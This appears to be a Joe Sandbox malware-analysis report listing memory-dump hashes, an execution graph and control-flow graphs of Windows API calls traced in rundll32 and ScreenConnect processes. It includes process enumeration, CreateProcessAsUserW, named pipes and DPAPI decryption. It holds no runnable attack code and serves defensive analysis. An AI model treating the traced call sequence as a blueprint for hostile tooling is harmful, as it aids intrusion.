                                                                                    • Instruction ID: b0ac53651a226b45d3577f66e97d885fd0dbe25d3107e9813e6eb56ffa04fba1
                                                                                    • Opcode Fuzzy Hash: 84db73eef00960ea873e9d4449fd7f171d705fc98f4297d889be22794b9da253
                                                                                    • Instruction Fuzzy Hash: 9D21A070F01218DBDB58DBA1E8997AE7BB3EBC9604F148429E902B7380DF745D05CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d764992ecb2bf266af6b49b35224a9897abbad13a3ca11aff8efef6335f0169
                                                                                    • Instruction ID: c72753677c0fcfbd5fa9fac10ef44b75b9dafa04834c78abf4c1d246ea7f10a5
                                                                                    • Opcode Fuzzy Hash: 5d764992ecb2bf266af6b49b35224a9897abbad13a3ca11aff8efef6335f0169
                                                                                    • Instruction Fuzzy Hash: 5C217E70F01218DBEB58DBA1E4997AE7BB7EB89604F148429E502B7380DF745D05CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94d6beae6d23b1ada36fc01c7754e93931cea5ac27e4cf8ef431eee4a5d0f866
                                                                                    • Instruction ID: e55e275314c0e639bc4468d6efc492e117bc332dba8ce1f9d1e38f31706cc879
                                                                                    • Opcode Fuzzy Hash: 94d6beae6d23b1ada36fc01c7754e93931cea5ac27e4cf8ef431eee4a5d0f866
                                                                                    • Instruction Fuzzy Hash: A3214A75E101189FCB84DF68D8859DEBBB1EF8D710F10812AE815EB320DB319842CBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 83dca052aa6722788a1f54947d8a666d679cee7f590ae2e3c265e8ae72508531
                                                                                    • Instruction ID: 27c93862048732b4f322d8208142418204d9241c622a7a8b0376327ab4422b14
                                                                                    • Opcode Fuzzy Hash: 83dca052aa6722788a1f54947d8a666d679cee7f590ae2e3c265e8ae72508531
                                                                                    • Instruction Fuzzy Hash: A8115130A00114AFEB84DF95D854AAE7BF2EF8D311F148029D419E7380DE79AC468B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7aee4707ab14f43af22ae2cc4f3b20045fcbaae90d40bfe1061bc4897a9dc652
                                                                                    • Instruction ID: 435ff263311b89ff363dee5a94e1d6c29ecae4dae5e4b2f6d7d9ca8b50ece698
                                                                                    • Opcode Fuzzy Hash: 7aee4707ab14f43af22ae2cc4f3b20045fcbaae90d40bfe1061bc4897a9dc652
                                                                                    • Instruction Fuzzy Hash: 36113034A00214AFEB84DFA5C854AAE7BF6EFCD311F148029E415E7390DF79AC469B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f44d087c695c9d1382bbefb5343c5b7949e20c869560b195b43dafeceb0145e
                                                                                    • Instruction ID: 3ba60c00dbde5c625e70648e4f0024d9abac35e638eafeff02a73b969e8b9866
                                                                                    • Opcode Fuzzy Hash: 8f44d087c695c9d1382bbefb5343c5b7949e20c869560b195b43dafeceb0145e
                                                                                    • Instruction Fuzzy Hash: E6112E34A00114AFEB84DF65D855AAD7BB2EFCD321F144029D459E7384CF79AC86CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ffd9f107ed1b110e6aadfe8ea7869306a9932109261125f182fefbe13c7624c
                                                                                    • Instruction ID: 09cc6b7171488b15c0754eb5bb651eaf99b0fa925c5f7f01456c284c3edf4ac1
                                                                                    • Opcode Fuzzy Hash: 2ffd9f107ed1b110e6aadfe8ea7869306a9932109261125f182fefbe13c7624c
                                                                                    • Instruction Fuzzy Hash: 25110034A00114AFEB84DF55D855AAD77E6EF89311F144029D459E7380CF79AC86CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aefacfaea77670655b6c9e9b8fc5458f743165aa666ff1ea27e780e90331cd01
                                                                                    • Instruction ID: bec98511f647f9eef3aba122e3bfdc03203068366cf463c398ea81c5662708e4
                                                                                    • Opcode Fuzzy Hash: aefacfaea77670655b6c9e9b8fc5458f743165aa666ff1ea27e780e90331cd01
                                                                                    • Instruction Fuzzy Hash: A1116D35600264AFEB44CF65D459AAD7BF2EF8D321F184029E44AE7340CB796C4ACB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf0813d0e1f1028c07c106bf5b360a54f659f02fdb9318d448c82b03de8735d6
                                                                                    • Instruction ID: c71ec13a55d8e95d23e86348ea02b44c53900e4ba19c1f81f234609a0b19478b
                                                                                    • Opcode Fuzzy Hash: bf0813d0e1f1028c07c106bf5b360a54f659f02fdb9318d448c82b03de8735d6
                                                                                    • Instruction Fuzzy Hash: 8821F071D042498FDB20DFAAC485AEEFBB4FB49224F14842AD519A7200C7795906CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b5a473e8b112467d9569b1d0149187bdc8d149bb1a3f818f0268ae79efd8abc3
                                                                                    • Instruction ID: 095d8086976dea482ac152ff281fd9b7b2104ee887499ee8a4ae07a57417caa4
                                                                                    • Opcode Fuzzy Hash: b5a473e8b112467d9569b1d0149187bdc8d149bb1a3f818f0268ae79efd8abc3
                                                                                    • Instruction Fuzzy Hash: 8F01A536F0011C8BDF548AA9DC202EEB7FAEF89315F04403AC605F7254DB399A45C7A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 431d6d624d0546a3fd1046bc73b197e2b6ff3b9da25ad19b1a34e4d5327e39b5
                                                                                    • Instruction ID: 60c27a613d0d013165612a6485027d229be4fa804d7d529d948c57979d3e0b73
                                                                                    • Opcode Fuzzy Hash: 431d6d624d0546a3fd1046bc73b197e2b6ff3b9da25ad19b1a34e4d5327e39b5
                                                                                    • Instruction Fuzzy Hash: 4311E371D04249DBDB20DFAAC884BAEFBF4FB49224F14842AD559A7240C7796905CFA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8575347d2278eff7a908a7de47cd48d80288ee2b01bf6456fb333b2b0f89d579
                                                                                    • Instruction ID: 1a5b534efe6be055bd51101ad329f39f77d91b47554b2f5f298b6b6a428d95b8
                                                                                    • Opcode Fuzzy Hash: 8575347d2278eff7a908a7de47cd48d80288ee2b01bf6456fb333b2b0f89d579
                                                                                    • Instruction Fuzzy Hash: 2A018F7A3101108F8748DA6EF49486EBBAAFBC8274315803BEA05C7310CE32EC178794
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 537a7fbf4ccbc6c792a325fe5a8df5c37a090425bb7bbbb2be654533cec2684f
                                                                                    • Instruction ID: 7fcdf303382ff7872a4dbad613bc5f6a06562ee0803098e6638168b506f6bd53
                                                                                    • Opcode Fuzzy Hash: 537a7fbf4ccbc6c792a325fe5a8df5c37a090425bb7bbbb2be654533cec2684f
                                                                                    • Instruction Fuzzy Hash: 6911FB35600224AFEB44DF65D459AAD7BF6FF8C321F184029E40AE7380CB79AC46DB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.1575857411.00000000040ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 040ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40ed000_rundll32.jbxd
                                                                                    • Opcode Fuzzy Hash: 5442c9c7a3f9d740d004b4b1f4268feef79c9c29c430cdda4b1538e00acb6132
                                                                                    • Instruction Fuzzy Hash: 2BD05E70A0120CEFCB40EFF8E9025ADBBF9EF48204B1045A9E809E3200FE316F049B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7eef1bc640e6e9bf2ecb77bf59765163bd086efe866f59c09c38c3318ffdf91
                                                                                    • Instruction ID: e0aba7e5ff2937f56d83f034e96de5dbf7de99f9aea910c2587237bfe95772ab
                                                                                    • Opcode Fuzzy Hash: f7eef1bc640e6e9bf2ecb77bf59765163bd086efe866f59c09c38c3318ffdf91
                                                                                    • Instruction Fuzzy Hash: 64C08C76EA46008BE248868400056EEB3A0FB3132AB8880BB810449111622E04239821

                                                                                    Execution Graph

                                                                                    Execution Coverage:13.4%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:7.4%
                                                                                    Total number of Nodes:95
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph 38327 51b2c98 38328 51b2cec ConnectNamedPipe 38327->38328 38329 51b2d28 38328->38329 38329->38329 38330 51b0040 38331 51b0071 38330->38331 38339 51b0be0 38331->38339 38332 51b00c7 38334 51b0207 38332->38334 38345 51b1370 38332->38345 38349 51b135f 38332->38349 38333 51b0a4e 38333->38333 38353 51b2ebe 38334->38353 38340 51b0c14 38339->38340 38342 51b0c5c 38340->38342 38361 51a5e18 38340->38361 38369 51a5e28 38340->38369 38341 51b0cec 38342->38332 38346 51b137f 38345->38346 38412 51b13d0 38346->38412 38350 51b1370 38349->38350 38352 51b13d0 2 API calls 38350->38352 38351 51b1394 38351->38334 38352->38351 38354 51b2ede 38353->38354 38356 51b2ef7 38354->38356 38425 51b3010 38354->38425 38429 51b3020 38354->38429 38355 51b2f20 38359 51b3010 WaitNamedPipeW 38355->38359 38360 51b3020 WaitNamedPipeW 38355->38360 38356->38333 38359->38356 38360->38356 38362 51a5e4c 38361->38362 38363 51a5e5c 38361->38363 38364 51a5e55 38362->38364 38365 51a63b0 4 API calls 38362->38365 38366 51a63a0 4 API calls 38362->38366 38377 51a63a0 38363->38377 38384 51a63b0 38363->38384 38364->38341 38365->38362 38366->38362 38371 51a5e5c 38369->38371 38372 51a5e4c 38369->38372 38370 51a5e55 38370->38341 38375 51a63b0 4 API calls 38371->38375 38376 51a63a0 4 API calls 38371->38376 38372->38370 38373 51a63b0 4 API calls 38372->38373 38374 51a63a0 4 API calls 38372->38374 38373->38372 38374->38372 38375->38372 38376->38372 38378 51a63aa 38377->38378 38379 51a63d5 38378->38379 38391 51a6530 38378->38391 38398 51a6520 38378->38398 38380 51a63de 38379->38380 38405 51a5fd0 38379->38405 38380->38362 38385 51a63d5 38384->38385 38386 51a63e5 38384->38386 38387 51a63de 38385->38387 38388 51a5fd0 ProcessIdToSessionId 38385->38388 38389 51a6530 2 API calls 38386->38389 38390 51a6520 2 API calls 38386->38390 38387->38362 38388->38385 38389->38385 38390->38385 38396 51a655a 38391->38396 38397 51a6547 38391->38397 
38392 51a6550 38392->38379 38393 51a66c2 K32EnumProcesses 38394 51a66fa 38393->38394 38394->38379 38396->38397 38408 51a5fdc 38396->38408 38397->38392 38397->38393 38403 51a6530 38398->38403 38399 51a6550 38399->38379 38400 51a66c2 K32EnumProcesses 38401 51a66fa 38400->38401 38401->38379 38402 51a5fdc K32EnumProcesses 38402->38403 38403->38402 38404 51a6547 38403->38404 38404->38399 38404->38400 38406 51a6760 ProcessIdToSessionId 38405->38406 38407 51a67d3 38406->38407 38407->38379 38409 51a6670 K32EnumProcesses 38408->38409 38411 51a66fa 38409->38411 38411->38396 38413 51b140b 38412->38413 38417 51b2640 38413->38417 38421 51b2639 38413->38421 38414 51b14d9 38418 51b2693 CreateProcessAsUserW 38417->38418 38420 51b2724 38418->38420 38420->38414 38422 51b2693 CreateProcessAsUserW 38421->38422 38424 51b2724 38422->38424 38424->38414 38427 51b302d 38425->38427 38428 51b3064 38427->38428 38433 51b1f6c 38427->38433 38428->38355 38432 51b302d 38429->38432 38430 51b1f6c WaitNamedPipeW 38430->38432 38431 51b3064 38431->38355 38432->38430 38432->38431 38434 51b3088 WaitNamedPipeW 38433->38434 38436 51b3104 38434->38436 38436->38427 38441 51bfb60 38443 51bfbbe 38441->38443 38442 51bfc33 CreateFileA 38444 51bfc95 38442->38444 38443->38442 38443->38443 38437 3a416f8 38438 3a41740 CryptProtectData 38437->38438 38439 3a4173a 38437->38439 38440 3a41783 38438->38440 38439->38438

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 474 51b2640-51b2691 475 51b269c-51b26a0 474->475 476 51b2693-51b2699 474->476 477 51b26a8-51b26bd 475->477 478 51b26a2-51b26a5 475->478 476->475 479 51b26cb-51b2722 CreateProcessAsUserW 477->479 480 51b26bf-51b26c8 477->480 478->477 481 51b272b-51b2753 479->481 482 51b2724-51b272a 479->482 480->479 482->481
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 051B270F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 55ba856c7ff3daf7fd3a7fd8c0ae106485d0f9f9053d2a67ac77fa41319e7f24
                                                                                    • Instruction ID: 6886fe95aa6c615d3cbc4290ee9fe7afb8413295d784b60ba92c5b88dc2727de
                                                                                    • Opcode Fuzzy Hash: 55ba856c7ff3daf7fd3a7fd8c0ae106485d0f9f9053d2a67ac77fa41319e7f24
                                                                                    • Instruction Fuzzy Hash: 26413376900209DFDF10CFAAC880ADEBBF6FF48310F14842AE928A7250D775A955CF90
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03A4176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2814154500.0000000003A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_3a40000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: afade254fc5af48b9cad70bd3961d886ea556961f6b9b0d23974e0f7c08b9d41
                                                                                    • Instruction ID: 98b5bc6c4bdc636c09f22db50c6be8e855ce30b974e137bbab197a5b239d285c
                                                                                    • Opcode Fuzzy Hash: afade254fc5af48b9cad70bd3961d886ea556961f6b9b0d23974e0f7c08b9d41
                                                                                    • Instruction Fuzzy Hash: 8E212876800249DFDB10CF9AC844BDEBBF1FF88310F14852AE919A7211C379A555CFA1
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03A4176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2814154500.0000000003A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_3a40000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: 20f8b9b8b020a707c17eb7bf0a06ba97714d3f88bd35df5485ed0bf8c1628aaa
                                                                                    • Instruction ID: 4010e2a531aa9a6cd175c0272eee14e7eae3a27ea41ad0901572e3b1351beaa0
                                                                                    • Opcode Fuzzy Hash: 20f8b9b8b020a707c17eb7bf0a06ba97714d3f88bd35df5485ed0bf8c1628aaa
                                                                                    • Instruction Fuzzy Hash: 852104B6800249DFDB10CF9AC844ADEBBF5FF88310F14841AE929A7251C379A555CFA1
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2DD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 086871d34db8b01d6f9101d66bbb068e80d3c9513885498e8cd11cb1a2b6f867
                                                                                    • Instruction ID: e8cc260689a6297a5c67043201fb814f3a0ed4a332958883ac6191436365ff93
                                                                                    • Opcode Fuzzy Hash: 086871d34db8b01d6f9101d66bbb068e80d3c9513885498e8cd11cb1a2b6f867
                                                                                    • Instruction Fuzzy Hash: 0621567A800249DFDB11CF9AC845BDEBBF4EF48320F148419E924A7251D339A555CFA1
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2DD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 54e2e874a0bab63562ab3986cbee634b1fa5e23263db50c1dbcd016adab0417d
                                                                                    • Instruction ID: fcc2176619150ce76268ef2138b6fdb29bdfe52ffb4b7ce56c68fd58e8608683
                                                                                    • Opcode Fuzzy Hash: 54e2e874a0bab63562ab3986cbee634b1fa5e23263db50c1dbcd016adab0417d
                                                                                    • Instruction Fuzzy Hash: 64212676800249DFDF10CF9AC845BDEBBF4EF48320F148419E924A7251C339A555DFA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 384 51a6530-51a6545 385 51a655a-51a6561 384->385 386 51a6547-51a654a 384->386 389 51a6566-51a65aa call 51a5fdc 385->389 387 51a6550-51a6559 386->387 388 51a6614-51a6628 386->388 390 51a662a 388->390 391 51a65ee-51a65f7 388->391 410 51a65af-51a65b4 389->410 395 51a6636-51a663f 390->395 393 51a65f9-51a6613 391->393 394 51a6654-51a6668 391->394 398 51a666a-51a66b6 394->398 399 51a66c0 394->399 402 51a66c2-51a66f8 K32EnumProcesses 398->402 403 51a66b8-51a66bd 398->403 399->402 404 51a66fa-51a6700 402->404 405 51a6701-51a6729 402->405 403->399 404->405 411 51a65ba-51a65bd 410->411 412 51a6640-51a664d 410->412 413 51a65bf-51a65ec 411->413 414 51a662c-51a6631 411->414 412->394 413->391 413->395 414->389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 528407946e899df07106ac7daefdf837c76de02468fbbc0b11d57bf4c2ea4241
                                                                                    • Instruction ID: 8f3e094f378587c3f65dc90d67c33ac9e605d3aa4c3d08ce48322fa86ad5ebab
                                                                                    • Opcode Fuzzy Hash: 528407946e899df07106ac7daefdf837c76de02468fbbc0b11d57bf4c2ea4241
                                                                                    • Instruction Fuzzy Hash: 75519F76A007058FCB24CFA9D884AAEBBF5FF88310F14892ED45AD7641D734E905CBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 419 51bfb54-51bfb5d 420 51bfb78-51bfbbc 419->420 421 51bfb5f-51bfb74 419->421 422 51bfbbe-51bfbe3 420->422 423 51bfc10-51bfc93 CreateFileA 420->423 421->420 422->423 426 51bfbe5-51bfbe7 422->426 432 51bfc9c-51bfcda 423->432 433 51bfc95-51bfc9b 423->433 427 51bfc0a-51bfc0d 426->427 428 51bfbe9-51bfbf3 426->428 427->423 430 51bfbf7-51bfc06 428->430 431 51bfbf5 428->431 430->430 434 51bfc08 430->434 431->430 438 51bfcea 432->438 439 51bfcdc-51bfce0 432->439 433->432 434->427 441 51bfceb 438->441 439->438 440 51bfce2 439->440 440->438 441->441
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 051BFC7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: eea37fea9c0bbf6df70d25d0215eadf9643f5a8b69a32f7e66fee3fde8e26bec
                                                                                    • Instruction ID: a752bc498c4254de7bd77b2602e0c0783953a635cb3ef9d0616e9dc8b8a6342f
                                                                                    • Opcode Fuzzy Hash: eea37fea9c0bbf6df70d25d0215eadf9643f5a8b69a32f7e66fee3fde8e26bec
                                                                                    • Instruction Fuzzy Hash: 2B515CB1D10249DFEB10CFA9C985BDDBBF1BB48304F248529E808AB351D7B59945CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 442 51bfb60-51bfbbc 443 51bfbbe-51bfbe3 442->443 444 51bfc10-51bfc93 CreateFileA 442->444 443->444 447 51bfbe5-51bfbe7 443->447 453 51bfc9c-51bfcda 444->453 454 51bfc95-51bfc9b 444->454 448 51bfc0a-51bfc0d 447->448 449 51bfbe9-51bfbf3 447->449 448->444 451 51bfbf7-51bfc06 449->451 452 51bfbf5 449->452 451->451 455 51bfc08 451->455 452->451 459 51bfcea 453->459 460 51bfcdc-51bfce0 453->460 454->453 455->448 462 51bfceb 459->462 460->459 461 51bfce2 460->461 461->459 462->462
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 051BFC7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: d701a793d7b197a07a3d6be0f2c26df55e47fd8bb8841b25a639b495a3b33874
                                                                                    • Instruction ID: 5b9e3b353e40b1290c3dca5c02adc5cb4955e2818bc8b2ceeda415854dca3444
                                                                                    • Opcode Fuzzy Hash: d701a793d7b197a07a3d6be0f2c26df55e47fd8bb8841b25a639b495a3b33874
                                                                                    • Instruction Fuzzy Hash: 074148B1D10249DFEB10CFA9C985BDEBBF1BB48304F248529E808AB351D7B59885CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 463 51b2639-51b2691 464 51b269c-51b26a0 463->464 465 51b2693-51b2699 463->465 466 51b26a8-51b26bd 464->466 467 51b26a2-51b26a5 464->467 465->464 468 51b26cb-51b2722 CreateProcessAsUserW 466->468 469 51b26bf-51b26c8 466->469 467->466 470 51b272b-51b2753 468->470 471 51b2724-51b272a 468->471 469->468 471->470
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 051B270F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 27bd0995e9a03087a4de92c1176362a406a484a3eee319cdb47fa7fc207ff484
                                                                                    • Instruction ID: e033c7260ff96a6f8b7c827b6e7f79b2b007d5670ae0d96bbb81f0ba6525ba40
                                                                                    • Opcode Fuzzy Hash: 27bd0995e9a03087a4de92c1176362a406a484a3eee319cdb47fa7fc207ff484
                                                                                    • Instruction Fuzzy Hash: 3A41247690024ADFDF11CFA9C880ADEBBF2FF48310F14842AE928A7250D775A955CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 485 51b2c8d-51b2d26 ConnectNamedPipe 487 51b2d28-51b2d2e 485->487 488 51b2d2f-51b2d71 485->488 487->488 492 51b2d7b 488->492 493 51b2d73 488->493 494 51b2d7c 492->494 493->492 494->494
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 051B2D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
